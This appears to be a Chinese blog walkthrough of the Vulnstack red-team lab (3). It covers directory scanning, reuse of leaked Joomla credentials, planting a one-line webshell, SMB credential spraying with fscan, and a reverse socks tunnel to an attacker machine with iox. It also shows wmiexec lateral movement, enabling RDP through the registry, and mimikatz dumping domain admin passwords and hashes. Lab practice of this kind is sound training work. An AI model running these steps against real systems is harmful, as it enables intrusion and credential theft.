红队评估实战靶场(三)

最新推荐文章于 2024-08-25 23:45:35 发布
最新推荐文章于 2024-08-25 23:45:35 发布
阅读量230 收藏
点赞数 1
文章标签: 安全 网络安全 tcp/ip rpc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/132109689
版权
文章描述了一次针对Centsos环境的渗透测试过程,包括网络配置、web应用漏洞利用(如dirsearch扫描和文件内容获取)、内网扫描、权限管理、SSH隧道搭建、域控密码获取等步骤。
摘要由CSDN通过智能技术生成

环境下载

http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

网络搭建

Centsos 默认192.18.93.100,图片IP地址有误
在这里插入图片描述

添加WMnet2 网络,仅主机模式,子网IP 192.168.93.0
在这里插入图片描述

web渗透

web_centsos ,ubuntu

开放的端口

80,22,3306

dirsearch扫描

工具地址:https://github.com/maurosoria/dirsearch

命令:

python3 dirsearch.py -u http://192.168.0.101/ -e*

在这里插入图片描述

扫描出来 /configuration.php~配置文件,文件内容有数据账户密码
testuser cvcvgjASD!@

am2zu_users表添加管理员用户

$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti   123456

在这里插入图片描述

am2zu_user_usergroup_map 配置权限
在这里插入图片描述

joomal后台写shell

使用添加的管理员账户登录后台

http://192.168.0.101/administrator/index.php  test 123456

在这里插入图片描述

在index.php 添加一句话语句
在这里插入图片描述

保存访问首页,然后连接蚁剑
在这里插入图片描述

/tmp/mysql/test.txt 文件中存有ssh用户密码

adduser wwwuser
passwd wwwuser_123Aqx

ssh wwwuser@192.168.0.101

登录上去ssh后,发现两个ip不一样,使用了nginx反向代理
在这里插入图片描述

内网渗透

fscan内网扫描

将fscan上传到192.168.93.100机器上去,扫描内网smb

./fscan_386 -h 192.168.93.0/24 -pwdf 2.txt -m smb

(icmp) Target 192.168.93.1    is alive
(icmp) Target 192.168.93.10   is alive
(icmp) Target 192.168.93.20   is alive
(icmp) Target 192.168.93.30   is alive
(icmp) Target 192.168.93.100  is alive
(icmp) Target 192.168.93.120  is alive
[*] Icmp alive hosts len is: 6
192.168.93.30:445 open
192.168.93.1:445 open
192.168.93.20:445 open
192.168.93.10:445 open
[*] alive ports len is: 4
start vulscan
[+] SMB:192.168.93.30:445:administrator 123qwe!ASD
[+] SMB:192.168.93.20:445:administrator 123qwe!ASD

搭建socks5隧道 iox

使用iox工具来搭建隧道

攻击机vps监听

iox.exe proxy -l 9999 -l 1080

在这里插入图片描述

内网机器执行命令,192.168.0.102为攻击机ip

./iox proxy -r 192.168.0.102:9999

在这里插入图片描述

建立连接
在这里插入图片描述

Proxifier

使用Proxifier工具来配置socks5
在这里插入图片描述

wmiexec 连接smb

wmiexec.exe administrator:123qwe!ASD@192.168.93.30
wmiexec.exe administrator:123qwe!ASD@192.168.93.20

在这里插入图片描述

开启3389端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

开启了3389后,使用administrator账户登录,为了方便文件传输,在登录3389时,设置本地资源-> 驱动器

administrator:123qwe!ASD@192.168.93.30
administrator:123qwe!ASD@192.168.93.20

在这里插入图片描述

使用mimikatz读取密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> mimi.txt

在这里插入图片描述

获取到域控管理员密码

Session           : Interactive from 2
User Name         : Administrator
Domain            : TEST
Logon Server      : WIN-8GA56TNV3MV
Logon Time        : 2019/12/15 13:24:56
SID               : S-1-5-21-1528753600-3951244198-520479113-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : TEST
	 * LM       : fc5d63d71569f04399b419bc76e2eb34
	 * NTLM     : 18edd0cc3227be3bf61ce198835a1d97
	 * SHA1     : 0f058e319f079c15fe3449bbeffc086cfa4d231e
	tspkg :	
	 * Username : Administrator
	 * Domain   : TEST
	 * Password : zxcASDqw123!!
	wdigest :	
	 * Username : Administrator
	 * Domain   : TEST
	 * Password : zxcASDqw123!!
	kerberos :	
	 * Username : Administrator
	 * Domain   : TEST.ORG
	 * Password : zxcASDqw123!!
	ssp :	
	credman :

使用wmiexec 登录域控

wmiexec.exe administrator:zxcASDqw123!!@192.168.93.10

在这里插入图片描述

yr678
关注
《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略
午夜安全
05-24 3万+
1.简介 Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这款工具被红队广泛使用,它简直是内网横向移动的大杀器。 2.主要功能 (1)信息搜集: 存活探测(icmp) 端口扫描 (2)爆破功能: 各类服务爆破(ssh、smb、rdp等)...
ATK&CK1红队评估实战靶场Vulnstack之第二篇web漏洞
千寻的博客
07-21 874
文章目录0x01 信息收集主机探测端口扫描目录浏览0x02 漏洞利用方式一phpmyadmin弱口令+全局日志getshhell第一步 扫描目录第二步 使用弱口令登录第步 查询全局日志变量配置第四步开启全局日志并修改日志保存位置第五步 查询一句话写入日志第六步 连接方式二yxcms任意文件读写,getshell第一步目录扫描发现yxcm和备份文件第二步发现存在信息泄露,泄露口令为弱口令第步 使用弱口令登录第四步直接在前台模板创建新的模板,内容为一句话木马第五步 根据之前下载的备份文件内容,查找出文件路径
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-25 3527
ATT&CK红队评估(红日靶场)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
ATT&CK红队评估实战靶场()
m0_58177121的博客
08-20 686
靶场描述 基本信息 作者:licong 环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。 除重新获取ip,不建议进行任何虚拟机操作。 参考虚拟机网络配置,添加新的网络,该网络作为内部网络。 注:名称及网段必须符合上述图片,进行了固定ip配置。 描述 目标:域控中存在一份重要文件。 本次环境为黑盒测试,不提供虚拟机账号密码。 利用漏洞进入内网 端口
8月25日笔记
最新发布
m0_74736832的博客
08-25 819
iox是一款功能强大的端口转发&内网代理工具,该工具的功能类似于lcx和ew,但是iox的功能和性能都更加强大。实际上,lcx和ew都是非常优秀的工具,但还是有地方可以提升的。在一开始使用这些工具的一段时间里,那些复杂的命令行参数是很难记忆的,比如说tran、slave、rcsocks和sssocks等等。这些工具的工作机制非常清晰,明明可以用简单的参数来表示的,为什么要用这么复杂的参数来代替呢?除此之外,这些工具的网络编程逻辑也是可以优化的。
红队快速打点工具-fscan
siu~
09-23 2468
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 该工具不仅只能用于内网,外网同样能够使用。
ATT\\\\&CK红队评估实战靶场
08-16
- *1* *2* [ATT&CK红队评估实战靶场(二)](https://blog.csdn.net/qq_53263789/article/details/115282950)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
ATK&CK1红队评估实战靶场Vulnstack之第篇CS内网域控
千寻的博客
07-21 744
文章目录蚁剑成功连接shellCS生成shell蚁剑执行CS的shell,进行联动CS进行嗅探CS查看文件CS获取HashCS查看域环境CS获取域内主机列表CS获取域内主机win2008CS获取域内主机win2003最终获取的域内主机信息摘抄 蚁剑成功连接shell CS生成shell attack-->web DRIVE-BY -->scripted web delivery 蚁剑执行CS的shell,进行联动 CS进行嗅探 sleep 0 shell systeminfo #发现
ATT&CK红队评估(红日靶场二)
weixin_45682839的博客
04-11 2855
靶场搭建 靶场下载地址:漏洞详情 一共有台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
ATK&CK1红队评估实战靶场Vulnstack之第一篇环境介绍和搭建
千寻的博客
07-21 931
文章目录靶机介绍靶机下载地址靶机背景靶机实战思路一、环境搭建二、漏洞利用、内网搜集四、横向移动五、构建通道六、持久控制七、痕迹清理靶机环境拓扑环境搭建靶机环境地址WEB服务器:windows7系统域成员:windows server 2003系统![在这里插入图片描述](https://img-blog.csdnimg.cn/img_convert/fa957b0ccc538bf989301bbf270eda7c.png)域控服务器:windows server 2008系统攻击机器:kali 2021环
fscan——综合扫描工具
07-08
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
IOX_Routing_Protocols
12-04
IOX_Routing_Protocols
内网渗透系列:内网隧道之iox
闵行小鱼塘
04-09 7039
本文研究端口转发 & SOCKS代理工具的一个工具,iox
fscan工具的使用
年轻的痞子的博客
08-23 3万+
fscan 内网工具的介绍使用 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、计划任务反弹 shell、读取 win 网卡信息、web 指纹识别、web 漏洞扫描、netbios 探测、域控识别等功能
fscan:一键自动化、全方位漏洞扫描的开源工具
热门推荐
osfront的博客
04-23 4万+
简介 fscan 是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描。 它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 源码链接:https://github.com/shadow1ng/fscan 主要功能 1.信息搜集: 存活探测(icmp) 端口扫描 2.爆破功能: 各类服务爆破(ssh、smb等) 数据库密码爆破(mysql、mssql、re
fscan使用方法:一键自动化、全方位漏洞扫描的开源工具
weixin_50464560的博客
05-21 1万+
简介 fscan 是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描。 它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 源码链接:https://github.com/shadow1ng/fscan 主要功能 1.信息搜集: 存活探测(icmp) 端口扫描 2.爆破功能: 各类服务爆破(ssh、smb等) 数据
内网渗透系列:内网穿透(隧道)学习
闵行小鱼塘
06-30 9400
本文试图学习整理内网穿透技术
内网之靶场之VulnStack红队(五)
shy的博客
11-13 2340
环境搭建: 外网:192.168.135.0 内网:192.168.138.0 边界机器:win7 外网:192.168.135.150 内网:192.168.138.136 账号: heart 123.com #本地管理员用户 sun\Administrator dc123.com #域管用户 内网机器:winserver 2008 内网:192.168.138.136 账号: sun\admin 2020.com #由于需要改密码,我更改为2020.com1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值